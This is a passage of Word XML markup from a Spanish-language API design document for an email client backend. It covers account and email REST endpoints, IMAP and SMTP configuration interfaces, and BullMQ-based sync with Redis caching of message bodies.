                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Actualiza configuración de una cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">name?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imap?: Partial&lt;ImapConfig&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">smtp?: Partial&lt;SmtpConfig&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina una cuenta y todos sus datos locales</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:id/sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fuerza sincronización completa de la cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">full?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:id/status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Devuelve estado de sincronización y health check</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:id/test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Verifica conectividad IMAP/SMTP sin guardar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imap: ImapConfig</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">smtp: SmtpConfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de schemas TypeScript para configuración:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ImapConfig {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  host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port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secure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authMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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'oauth2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  authUser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authCredentials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se encripta antes de almacenar &lt;sup&gt;[154]&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  compress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SmtpConfig {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  host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port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secure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authMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="String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'oauth2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  authUser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authCredentials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se encripta antes de almacenar &lt;sup&gt;[154]&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/accounts/:id/sync</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">encola un job de sincronización en BullMQ para procesamiento en background. Cuando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">full=true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se invalida el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uidValidity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cacheado y se ejecuta una sincronización completa desde cero; cuando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">full=false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(default), se utiliza CONDSTORE o QRESYNC para una sincronización incremental que solo descarga mensajes nuevos o modificados desde la última sync</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. BullMQ gestiona retries con exponential backoff ante fallos transitorios de red y dead letter queues para mensajes que no pueden procesarse tras múltiples intentos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[203]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="emails"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Emails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El módulo de emails implementa el patrón</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">headers-first, body-on-demand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: el listado opera contra MongoDB local mientras que los cuerpos se obtienen vía IMAP bajo demanda y se cachean en Redis con TTL de 1 hora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[75]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista emails de una carpeta (desde MongoDB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">folderId: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">page?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">limit?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: 50),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sort?: 'date' \| 'subject' \| 'from'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">date</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">order?: 'asc' \| 'desc'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">desc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">query?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(búsqueda Atlas Search)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene headers y metadata de un email</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id/body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene cuerpo HTML/texto (IMAP on-demand → Redis cache)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">format?: 'html' \| 'text' \| 'both'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">both</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id/raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descarga el mensaje completo en formato RFC 822 (.eml)</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PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id/flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Actualiza flags IMAP (\Seen, \Flagged, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">flags: { seen?: boolean, answered?: boolean, flagged?: boolean, deleted?: boolean }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id/move</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mueve email a otra carpeta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">targetFolderId: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id/copy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Copia email a otra carpeta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">targetFolderId: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:accountId/emails/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina email (mueve a Trash o expurga)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">permanent?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
